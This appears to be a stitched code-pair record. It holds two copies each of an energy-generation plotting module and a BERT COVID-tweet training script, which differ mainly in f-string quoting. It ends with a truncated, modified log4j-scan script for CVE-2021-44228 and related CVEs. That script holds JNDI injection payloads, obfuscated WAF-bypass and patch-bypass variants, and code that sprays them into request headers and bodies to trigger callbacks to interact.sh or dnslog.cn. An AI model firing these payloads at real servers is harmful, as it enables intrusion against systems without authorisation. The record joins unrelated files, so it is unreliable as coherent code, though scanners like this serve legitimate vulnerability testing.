Unserved_Energy = Unserved_Energy/unitconversion['divisor']
scenario_names = pd.Series([scenario]*len(Stacked_Gen),name='Scenario')
data_table = Stacked_Gen.add_suffix(f" ({unitconversion["units"]})")
data_table = data_table.set_index([scenario_names],append=True)
data_tables.append(data_table)
for column in Stacked_Gen.columns:
axs[i].plot(Stacked_Gen.index.values, Stacked_Gen[column],
linewidth=2,
color=self.PLEXOS_color_dict.get(column,'#333333'),
label=column)
if (Unserved_Energy == 0).all() == False:
axs[i].plot(Unserved_Energy, color='#DD0200',
label='Unserved Energy')
mplt.set_yaxis_major_tick_format(sub_pos=i)
axs[i].margins(x=0.01)
mplt.set_subplot_timeseries_format(sub_pos=i)
if not data_tables:
self.logger.warning(f'No generation in {zone_input}')
out = MissingZoneData()
outputs[zone_input] = out
continue
data_table_out = pd.concat(data_tables)
# add facet labels
mplt.add_facet_labels(xlabels=self.xlabels,
ylabels = self.ylabels)
# Add legend
mplt.add_legend(reverse_legend=True, sort_by=self.ordered_gen)
# Remove extra supl
mplt.remove_excess_axs(excess_axs, grid_size)
# Add title
mplt.add_main_title(zone_input)
labelpad = 40
plt.ylabel(f"Generation ({unitconversion["units"]})",
color='black', rotation='vertical', labelpad=labelpad)
outputs[zone_input] = {'fig':fig, 'data_table':data_table_out}
return outputs
| """Timeseries generation line plots.
This code creates generation non-stacked line plots.
@author: Daniel Levie
"""
import logging
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
import marmot.config.mconfig as mconfig
from marmot.plottingmodules.plotutils.plot_library import SetupSubplot
from marmot.plottingmodules.plotutils.plot_data_helper import PlotDataHelper
from marmot.plottingmodules.plotutils.plot_exceptions import (MissingInputData, MissingZoneData)
class MPlot(PlotDataHelper):
"""generation_unstack MPlot class.
All the plotting modules use this same class name.
This class contains plotting methods that are grouped based on the
current module name.
The generation_unstack.py module contains methods that are
related to the timeseries generation of generators, displayed in an unstacked line format.
MPlot inherits from the PlotDataHelper class to assist in creating figures.
"""
def __init__(self, argument_dict: dict):
"""
Args:
argument_dict (dict): Dictionary containing all
arguments passed from MarmotPlot.
"""
# iterate over items in argument_dict and set as properties of class
# see key_list in Marmot_plot_main for list of properties
for prop in argument_dict:
self.__setattr__(prop, argument_dict[prop])
# Instantiation of MPlotHelperFunctions
super().__init__(self.Marmot_Solutions_folder, self.AGG_BY, self.ordered_gen,
self.PLEXOS_color_dict, self.Scenarios, self.ylabels,
self.xlabels, self.gen_names_dict, self.TECH_SUBSET,
Region_Mapping=self.Region_Mapping)
self.logger = logging.getLogger('marmot_plot.'+__name__)
self.curtailment_prop = mconfig.parser("plot_data","curtailment_property")
def gen_unstack(self, figure_name: str = None, prop: str = None,
start: float = None, end: float= None,
timezone: str = "", start_date_range: str = None,
end_date_range: str = None, **_):
"""Creates a timeseries plot of generation by technology each plotted as a line.
If multiple scenarios are passed they will be plotted in a facet plot.
The plot can be further customized by passing specific values to the
prop argument.
Args:
figure_name (str, optional): User defined figure output name.
Defaults to None.
prop (str, optional): Special argument used to adjust specific
plot settings. Controlled through the plot_select.csv.
Opinions available are:
- Peak Demand
- Min Net Load
- Date Range
Defaults to None.
start (float, optional): Used in conjunction with the prop argument.
Will define the number of days to plot before a certain event in
a timeseries plot, e.g Peak Demand.
Defaults to None.
end (float, optional): Used in conjunction with the prop argument.
Will define the number of days to plot after a certain event in
a timeseries plot, e.g Peak Demand.
Defaults to None.
timezone (str, optional): The timezone to display on the x-axes.
Defaults to "".
start_date_range (str, optional): Defines a start date at which to represent data from.
Defaults to None.
end_date_range (str, optional): Defines a end date at which to represent data to.
Defaults to None.
Returns:
dict: dictionary containing the created plot and its data table.
"""
outputs = {}
facet=False
if 'Facet' in figure_name:
facet = True
if self.AGG_BY == 'zone':
agg = 'zone'
else:
agg = 'region'
def getdata(scenario_list):
# List of properties needed by the plot, properties are a set of tuples and contain 3 parts:
# required True/False, property name and scenarios required, scenarios must be a list.
properties = [(True,"generator_Generation",scenario_list),
(False,f"generator_{self.curtailment_prop}",scenario_list),
(False,"generator_Pump_Load",scenario_list),
(True,f"{agg}_Load",scenario_list),
(False,f"{agg}_Unserved_Energy",scenario_list)]
# Runs get_formatted_data within PlotDataHelper to populate PlotDataHelper dictionary
# with all required properties, returns a 1 if required data is missing
return self.get_formatted_data(properties)
if facet:
check_input_data = getdata(self.Scenarios)
all_scenarios = self.Scenarios
else:
check_input_data = getdata([self.Scenarios[0]])
all_scenarios = [self.Scenarios[0]]
# Checks if all data required by plot is available, if 1 in list required data is missing
if 1 in check_input_data:
outputs = MissingInputData()
return outputs
# sets up x, y dimensions of plot
ncols, nrows = self.set_facet_col_row_dimensions(multi_scenario=all_scenarios)
# If the plot is not a facet plot, grid size should be 1x1
if not facet:
ncols = 1
nrows = 1
grid_size = ncols*nrows
# Used to calculate any excess axis to delete
plot_number = len(all_scenarios)
for zone_input in self.Zones:
self.logger.info(f"Zone = {zone_input}")
excess_axs = grid_size - plot_number
mplt = SetupSubplot(nrows, ncols, sharey=True,
squeeze=False, ravel_axs=True)
fig, axs = mplt.get_figure()
plt.subplots_adjust(wspace=0.05, hspace=0.5)
# If creating a facet plot the font is scaled by 9% for each added x dimesion fact plot
if ncols > 1:
font_scaling_ratio = 1 + ((ncols-1)*0.09)
plt.rcParams['xtick.labelsize'] *= font_scaling_ratio
plt.rcParams['ytick.labelsize'] *= font_scaling_ratio
plt.rcParams['legend.fontsize'] *= font_scaling_ratio
plt.rcParams['axes.labelsize'] *= font_scaling_ratio
plt.rcParams['axes.titlesize'] *= font_scaling_ratio
data_tables = []
for i, scenario in enumerate(all_scenarios):
self.logger.info(f"Scenario = {scenario}")
try:
Stacked_Gen = self["generator_Generation"].get(scenario).copy()
if self.shift_leapday == True:
Stacked_Gen = self.adjust_for_leapday(Stacked_Gen)
Stacked_Gen = Stacked_Gen.xs(zone_input,level=self.AGG_BY)
except KeyError:
# self.logger.info('No generation in %s',zone_input)
continue
if Stacked_Gen.empty == True:
continue
Stacked_Gen = self.df_process_gen_inputs(Stacked_Gen)
# Insert Curtailment into gen stack if it exists in database
Stacked_Curt = self[f"generator_{self.curtailment_prop}"].get(scenario).copy()
if not Stacked_Curt.empty:
curtailment_name = self.gen_names_dict.get('Curtailment','Curtailment')
if self.shift_leapday == True:
Stacked_Curt = self.adjust_for_leapday(Stacked_Curt)
if zone_input in Stacked_Curt.index.get_level_values(self.AGG_BY).unique():
Stacked_Curt = Stacked_Curt.xs(zone_input,level=self.AGG_BY)
Stacked_Curt = self.df_process_gen_inputs(Stacked_Curt)
# If using Marmot's curtailment property
if self.curtailment_prop == 'Curtailment':
Stacked_Curt = self.assign_curtailment_techs(Stacked_Curt)
Stacked_Curt = Stacked_Curt.sum(axis=1)
Stacked_Curt[Stacked_Curt<0.05] = 0 #Remove values less than 0.05 MW
Stacked_Gen.insert(len(Stacked_Gen.columns),column=curtailment_name,value=Stacked_Curt) #Insert curtailment into
# Calculates Net Load by removing variable gen + curtailment
vre_gen_cat = self.vre_gen_cat + [curtailment_name]
else:
vre_gen_cat = self.vre_gen_cat
else:
vre_gen_cat = self.vre_gen_cat
# Adjust list of values to drop depending on if it exists in Stacked_Gen df
vre_gen_cat = [name for name in vre_gen_cat if name in Stacked_Gen.columns]
Net_Load = Stacked_Gen.drop(labels = vre_gen_cat, axis=1)
Net_Load = Net_Load.sum(axis=1)
Stacked_Gen = Stacked_Gen.loc[:, (Stacked_Gen != 0).any(axis=0)]
Load = self[f"{agg}_Load"].get(scenario).copy()
if self.shift_leapday == True:
Load = self.adjust_for_leapday(Load)
Load = Load.xs(zone_input,level=self.AGG_BY)
Load = Load.groupby(["timestamp"]).sum()
Load = Load.squeeze() #Convert to Series
Pump_Load = self["generator_Pump_Load"][scenario].copy()
if Pump_Load.empty:
Pump_Load = self['generator_Generation'][scenario].copy()
Pump_Load.iloc[:,0] = 0
if self.shift_leapday == True:
Pump_Load = self.adjust_for_leapday(Pump_Load)
Pump_Load = Pump_Load.xs(zone_input,level=self.AGG_BY)
Pump_Load = Pump_Load.groupby(["timestamp"]).sum()
Pump_Load = Pump_Load.squeeze() #Convert to Series
if (Pump_Load == 0).all() == False:
Pump_Load = Load - Pump_Load
else:
Pump_Load = Load
Unserved_Energy = self[f"{agg}_Unserved_Energy"][scenario].copy()
if Unserved_Energy.empty:
Unserved_Energy = self[f"{agg}_Load"][scenario].copy()
Unserved_Energy.iloc[:,0] = 0
if self.shift_leapday == True:
Unserved_Energy = self.adjust_for_leapday(Unserved_Energy)
Unserved_Energy = Unserved_Energy.xs(zone_input,level=self.AGG_BY)
Unserved_Energy = Unserved_Energy.groupby(["timestamp"]).sum()
Unserved_Energy = Unserved_Energy.squeeze() #Convert to Series
if prop == "Peak Demand":
peak_pump_load_t = Pump_Load.idxmax()
end_date = peak_pump_load_t + dt.timedelta(days=end)
start_date = peak_pump_load_t - dt.timedelta(days=start)
# Peak_Pump_Load = Pump_Load[peak_pump_load_t]
Stacked_Gen = Stacked_Gen[start_date : end_date]
Load = Load[start_date : end_date]
Unserved_Energy = Unserved_Energy[start_date : end_date]
Pump_Load = Pump_Load[start_date : end_date]
elif prop == "Min Net Load":
min_net_load_t = Net_Load.idxmin()
end_date = min_net_load_t + dt.timedelta(days=end)
start_date = min_net_load_t - dt.timedelta(days=start)
# Min_Net_Load = Net_Load[min_net_load_t]
Stacked_Gen = Stacked_Gen[start_date : end_date]
Load = Load[start_date : end_date]
Unserved_Energy = Unserved_Energy[start_date : end_date]
Pump_Load = Pump_Load[start_date : end_date]
elif pd.notna(start_date_range):
self.logger.info(f"Plotting specific date range: \
{str(start_date_range)} to {str(end_date_range)}")
Stacked_Gen = Stacked_Gen[start_date_range : end_date_range]
Load = Load[start_date_range : end_date_range]
Unserved_Energy = Unserved_Energy[start_date_range : end_date_range]
else:
self.logger.info("Plotting graph for entire timeperiod")
# unitconversion based off peak generation hour, only checked once
if i == 0:
unitconversion = self.capacity_energy_unitconversion(Stacked_Gen)
Stacked_Gen = Stacked_Gen/unitconversion['divisor']
Unserved_Energy = Unserved_Energy/unitconversion['divisor']
scenario_names = pd.Series([scenario]*len(Stacked_Gen),name='Scenario')
data_table = Stacked_Gen.add_suffix(f" ({unitconversion['units']})")
data_table = data_table.set_index([scenario_names],append=True)
data_tables.append(data_table)
for column in Stacked_Gen.columns:
axs[i].plot(Stacked_Gen.index.values, Stacked_Gen[column],
linewidth=2,
color=self.PLEXOS_color_dict.get(column,'#333333'),
label=column)
if (Unserved_Energy == 0).all() == False:
axs[i].plot(Unserved_Energy, color='#DD0200',
label='Unserved Energy')
mplt.set_yaxis_major_tick_format(sub_pos=i)
axs[i].margins(x=0.01)
mplt.set_subplot_timeseries_format(sub_pos=i)
if not data_tables:
self.logger.warning(f'No generation in {zone_input}')
out = MissingZoneData()
outputs[zone_input] = out
continue
data_table_out = pd.concat(data_tables)
# add facet labels
mplt.add_facet_labels(xlabels=self.xlabels,
ylabels = self.ylabels)
# Add legend
mplt.add_legend(reverse_legend=True, sort_by=self.ordered_gen)
# Remove extra supl
mplt.remove_excess_axs(excess_axs, grid_size)
# Add title
mplt.add_main_title(zone_input)
labelpad = 40
plt.ylabel(f"Generation ({unitconversion['units']})",
color='black', rotation='vertical', labelpad=labelpad)
outputs[zone_input] = {'fig':fig, 'data_table':data_table_out}
return outputs
|
import os
import batch
import preprocessing
import train
import predict
import pandas as pd
from matplotlib import pyplot as plt
from covidDataset import CovidDataset
from torch.utils.data import DataLoader
from transformers import BertForSequenceClassification, BertTokenizer
from sklearn.model_selection import train_test_split
from torch import device, cuda, save
from collections import defaultdict
os.environ['CUDA_VISIBLE_DEVICE'] = '0'
# Preprocess training data
train_file = os.path.join('./', 'TwitterPost', 'train.csv')
df_train, map_en = preprocessing.preprocess(train_file)
# Preprocess testing data
test_file = os.path.join('./', 'TwitterPost', 'test.csv')
df_test, map_en = preprocessing.preprocess(test_file)
# Load bert model and tokenizer
PRETRAINED_MODEL_NAME = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME, do_lower_case=True)
# Self define Covid-train-Dataset and check the first sample
# i.e., converted (tokens_tensor, segments_tensor, label_tensor)
train_set = CovidDataset(df_train, tokenizer=tokenizer)
label, text = train_set.df.iloc[0].values
tokens_tensor, segments_tensor, label_tensor = train_set[0]
# Deduction to original text
tokens = tokenizer.convert_ids_to_tokens(tokens_tensor)
combined_text = ' '.join(tokens)
print(f"""[Original]\n
Text: {text}
Label: {label}
--------------------
[Coverted tensors]\n
tokens_tensor :{tokens_tensor}
segments_tensor:{segments_tensor}
label_tensor :{label_tensor}
#--------------------
#
#[Original tokens_tensors]\n
#{combined_text}
#\n""")
# DataLoader returned 64 samples at a time,
# "collate_fn" parameter defined the batch output
BATCH_SIZE = 64
train_set, val_set = train_test_split(train_set, test_size=0.1, random_state=2000)
train_loader = DataLoader(train_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
data = next(iter(train_loader))
tokens_tensors, segments_tensors, masks_tensors, label_ids = data
print(f"""
tokens_tensors.shape = {tokens_tensors.shape}
{tokens_tensors}
------------------------
segments_tensors.shape = {segments_tensors.shape}
{segments_tensors}
------------------------
masks_tensors.shape = {masks_tensors.shape}
{masks_tensors}
------------------------
label_ids.shape = {label_ids.shape}
{label_ids}
""")
# Fine-tune task is "BertForSequenceClassification"
model = BertForSequenceClassification.from_pretrained(
PRETRAINED_MODEL_NAME, num_labels=4)
# Numbers of parameters
model_params = [p for p in model.parameters() if p.requires_grad]
clf_params = [p for p in model.classifier.parameters() if p.requires_grad]
print(f"""
Parameters of total classifier(Bert + Linear):{sum(p.numel() for p in model_params)}
Parameters of linear classifier:{sum(p.numel() for p in clf_params)}
""")
## Let's begin to train and fine-tune
device = device('cuda:0' if cuda.is_available() else 'cpu')
print('device:', device)
model = model.to(device)
print('\n###Start training###\n')
print(f"{"Epoch":^7} | {"Train loss":^12} | {"Train accuracy":^9} |{"Val loss":^12} | {"Val accuracy":^9} |")
print("-" * 70)
EPOCHS = 4
history = defaultdict(list)
for epoch in range(EPOCHS):
best_accuracy = 0
# Training
train_acc, train_loss = train.train_epoch(model, train_loader, device)
print(f"{epoch + 1:^7} | {train_loss:^12.6f} | {train_acc:^15.2f}", end='')
# Evaluating
val_acc, val_loss = train.eval_epoch(model, val_loader, device)
print(f"| {val_loss:^11.6f} | {val_acc:^14.2f}")
print()
history['train_acc'].append(train_acc)
history['train_loss'].append(train_loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
# Save the best model
if val_acc > best_accuracy:
save(model.state_dict(), 'best_model_state.bin')
print('Training complete!')
# Plot the result
plt.plot(history['train_acc'], label='train acc')
plt.plot(history['val_acc'], label='val acc')
plt.title('Accuracy history')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend()
plt.ylim([0, 1])
plt.grid()
plt.savefig('acc_history.png')
plt.clf()
plt.plot(history['train_loss'], label='train loss')
plt.plot(history['val_loss'], label='val loss')
plt.title('Loss history')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend()
plt.grid()
plt.savefig('loss_history.png')
# Inference with test set
test_set = CovidDataset(df_test, tokenizer=tokenizer)
test_loader = DataLoader(test_set, batch_size=256,
collate_fn=batch.create_mini_batch)
predictions = predict.get_predictions(model, test_loader, device) ### Currently have a bug here, why prediction get tuple wite 2 same predicted results?
# Concat predition to .csv
df_pred = df_test
df_pred['prediction'] = predictions[0].tolist()
df_pred.to_csv('predict.csv', index=False)
| import os
import batch
import preprocessing
import train
import predict
import pandas as pd
from matplotlib import pyplot as plt
from covidDataset import CovidDataset
from torch.utils.data import DataLoader
from transformers import BertForSequenceClassification, BertTokenizer
from sklearn.model_selection import train_test_split
from torch import device, cuda, save
from collections import defaultdict
os.environ['CUDA_VISIBLE_DEVICE'] = '0'
# Preprocess training data
train_file = os.path.join('./', 'TwitterPost', 'train.csv')
df_train, map_en = preprocessing.preprocess(train_file)
# Preprocess testing data
test_file = os.path.join('./', 'TwitterPost', 'test.csv')
df_test, map_en = preprocessing.preprocess(test_file)
# Load bert model and tokenizer
PRETRAINED_MODEL_NAME = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME, do_lower_case=True)
# Self define Covid-train-Dataset and check the first sample
# i.e., converted (tokens_tensor, segments_tensor, label_tensor)
train_set = CovidDataset(df_train, tokenizer=tokenizer)
label, text = train_set.df.iloc[0].values
tokens_tensor, segments_tensor, label_tensor = train_set[0]
# Deduction to original text
tokens = tokenizer.convert_ids_to_tokens(tokens_tensor)
combined_text = ' '.join(tokens)
print(f"""[Original]\n
Text: {text}
Label: {label}
--------------------
[Coverted tensors]\n
tokens_tensor :{tokens_tensor}
segments_tensor:{segments_tensor}
label_tensor :{label_tensor}
#--------------------
#
#[Original tokens_tensors]\n
#{combined_text}
#\n""")
# DataLoader returned 64 samples at a time,
# "collate_fn" parameter defined the batch output
BATCH_SIZE = 64
train_set, val_set = train_test_split(train_set, test_size=0.1, random_state=2000)
train_loader = DataLoader(train_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
data = next(iter(train_loader))
tokens_tensors, segments_tensors, masks_tensors, label_ids = data
print(f"""
tokens_tensors.shape = {tokens_tensors.shape}
{tokens_tensors}
------------------------
segments_tensors.shape = {segments_tensors.shape}
{segments_tensors}
------------------------
masks_tensors.shape = {masks_tensors.shape}
{masks_tensors}
------------------------
label_ids.shape = {label_ids.shape}
{label_ids}
""")
# Fine-tune task is "BertForSequenceClassification"
model = BertForSequenceClassification.from_pretrained(
PRETRAINED_MODEL_NAME, num_labels=4)
# Numbers of parameters
model_params = [p for p in model.parameters() if p.requires_grad]
clf_params = [p for p in model.classifier.parameters() if p.requires_grad]
print(f"""
Parameters of total classifier(Bert + Linear):{sum(p.numel() for p in model_params)}
Parameters of linear classifier:{sum(p.numel() for p in clf_params)}
""")
## Let's begin to train and fine-tune
device = device('cuda:0' if cuda.is_available() else 'cpu')
print('device:', device)
model = model.to(device)
print('\n###Start training###\n')
print(f"{'Epoch':^7} | {'Train loss':^12} | {'Train accuracy':^9} |{'Val loss':^12} | {'Val accuracy':^9} |")
print("-" * 70)
EPOCHS = 4
history = defaultdict(list)
for epoch in range(EPOCHS):
best_accuracy = 0
# Training
train_acc, train_loss = train.train_epoch(model, train_loader, device)
print(f"{epoch + 1:^7} | {train_loss:^12.6f} | {train_acc:^15.2f}", end='')
# Evaluating
val_acc, val_loss = train.eval_epoch(model, val_loader, device)
print(f"| {val_loss:^11.6f} | {val_acc:^14.2f}")
print()
history['train_acc'].append(train_acc)
history['train_loss'].append(train_loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
# Save the best model
if val_acc > best_accuracy:
save(model.state_dict(), 'best_model_state.bin')
print('Training complete!')
# Plot the result
plt.plot(history['train_acc'], label='train acc')
plt.plot(history['val_acc'], label='val acc')
plt.title('Accuracy history')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend()
plt.ylim([0, 1])
plt.grid()
plt.savefig('acc_history.png')
plt.clf()
plt.plot(history['train_loss'], label='train loss')
plt.plot(history['val_loss'], label='val loss')
plt.title('Loss history')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend()
plt.grid()
plt.savefig('loss_history.png')
# Inference with test set
test_set = CovidDataset(df_test, tokenizer=tokenizer)
test_loader = DataLoader(test_set, batch_size=256,
collate_fn=batch.create_mini_batch)
predictions = predict.get_predictions(model, test_loader, device) ### Currently have a bug here, why prediction get tuple wite 2 same predicted results?
# Concat predition to .csv
df_pred = df_test
df_pred['prediction'] = predictions[0].tolist()
df_pred.to_csv('predict.csv', index=False)
|
#!/usr/bin/env python3
# coding=utf-8
# ******************************************************************
# log4j-scan: A generic scanner for Apache log4j RCE CVE-2021-44228
# Original Author:
# Mazin Ahmed <Mazin at FullHunt.io>
# Modified by Megan Howell (CyberQueenMeg)
# Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
# Secure your Attack Surface with FullHunt.io.
# ******************************************************************
import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
import random
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
if len(sys.argv) <= 1:
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
default_headers = {
'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
'Accept': '*/*' # not being tested to allow passing through checks on Accept header in older web-servers
}
post_data_parameters = ["username", "user", "email", "email_address", "password"]
timeout = 4
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
]
cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
cve_2021_45105 = [
"$${ctx:loginId}"
]
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-p", "--proxy",
dest="proxy",
help="send requests through proxy",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("--request-type",
dest="request_type",
help="Request Type: (get, post) - [Default: get].",
default="get",
action='store')
parser.add_argument("--headers-file",
dest="headers_file",
help="Headers fuzzing list - [default: headers.txt].",
default="headers.txt",
action='store')
parser.add_argument("--run-all-tests",
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
action='store_true')
parser.add_argument("--wait-time",
dest="wait_time",
help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
default=5,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
action='store_true')
parser.add_argument("--test-CVE-2021-45046",
dest="cve_2021_45046",
help="Test using payloads for CVE-2021-45046 (detection payloads).",
action='store_true')
parser.add_argument("--test-CVE-2021-45105",
dest="cve_2021_45105",
help="Test using payloads for CVE-2021-45105 (detection payloads).",
action='store_true')
parser.add_argument("--dns-callback-provider",
dest="dns_callback_provider",
help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
default="interact.sh",
action='store')
parser.add_argument("--custom-dns-callback-host",
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
action='store_true')
args = parser.parse_args()
proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
def get_fuzzing_headers(payload):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(args.headers_file, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
if args.exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
fuzzing_headers["Referer"] = f'https://{fuzzing_headers['Referer']}'
return fuzzing_headers
def get_fuzzing_post_data(payload):
fuzzing_post_data = {}
for i in post_data_parameters:
fuzzing_post_data.update({i: payload})
return fuzzing_post_data
def generate_waf_bypass_payloads(callback_host, random_string):
payloads = []
for i in waf_bypass_payloads:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45046_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45046:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45105_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45105:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
class Dnslog(object):
def __init__(self):
self.s = requests.session()
req = self.s.get("http://www.dnslog.cn/getdomain.php",
proxies=proxies,
timeout=30)
self.domain = req.text
def pull_logs(self):
req = self.s.get("http://www.dnslog.cn/getrecords.php",
proxies=proxies,
timeout=30)
return req.json()
class Interactsh:
# Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
def __init__(self, token="", server=""):
rsa = RSA.generate(2048)
self.public_key = rsa.publickey().exportKey()
self.private_key = rsa.exportKey()
self.token = token
self.server = server.lstrip('.') or 'interact.sh'
self.headers = {
"Content-Type": "application/json",
}
if self.token:
self.headers['Authorization'] = self.token
self.secret = str(uuid4())
self.encoded = b64encode(self.public_key).decode("utf8")
guid = uuid4().hex.ljust(33, 'a')
guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
self.domain = f'{guid}.{self.server}'
self.correlation_id = self.domain[:20]
self.session = requests.session()
self.session.headers = self.headers
self.session.verify = False
self.session.proxies = proxies
self.register()
def register(self):
data = {
"public-key": self.encoded,
"secret-key": self.secret,
"correlation-id": self.correlation_id
}
res = self.session.post(
f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
if 'success' not in res.text:
raise Exception("Can not initiate interact.sh DNS callback client")
def pull_logs(self):
result = []
url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
res = self.session.get(url, headers=self.headers, timeout=30).json()
aes_key, data_list = res['aes_key'], res['data']
for i in data_list:
decrypt_data = self.__decrypt_data(aes_key, i)
result.append(self.__parse_log(decrypt_data))
return result
def __decrypt_data(self, aes_key, data):
private_key = RSA.importKey(self.private_key)
cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
decode = base64.b64decode(data)
bs = AES.block_size
iv = decode[:bs]
cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
plain_text = cryptor.decrypt(decode)
return json.loads(plain_text[16:])
def __parse_log(self, log_entry):
new_log_entry = {"timestamp": log_entry["timestamp"],
"host": f'{log_entry['full-id']}.{self.domain}',
"remote_address": log_entry["remote-address"]
}
return new_log_entry
def parse_url(url):
"""
Parses the URL.
"""
# Url: https://example.com/login.jsp
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# FilePath: /login.jsp
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
return({"scheme": scheme,
"site": f"{scheme}://{urlparse.urlparse(url).netloc}",
"host": urlparse.urlparse(url).netloc.split(":")[0],
"file_path": file_path})
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]
if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url['host']}.{callback_host}', random_string))
if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads = get_cve_2021_45046_payloads(f'{parsed_url['host']}.{callback_host}', random_string)
for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
if args.request_type.upper() == "POST" or args.run_all_tests:
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
def main():
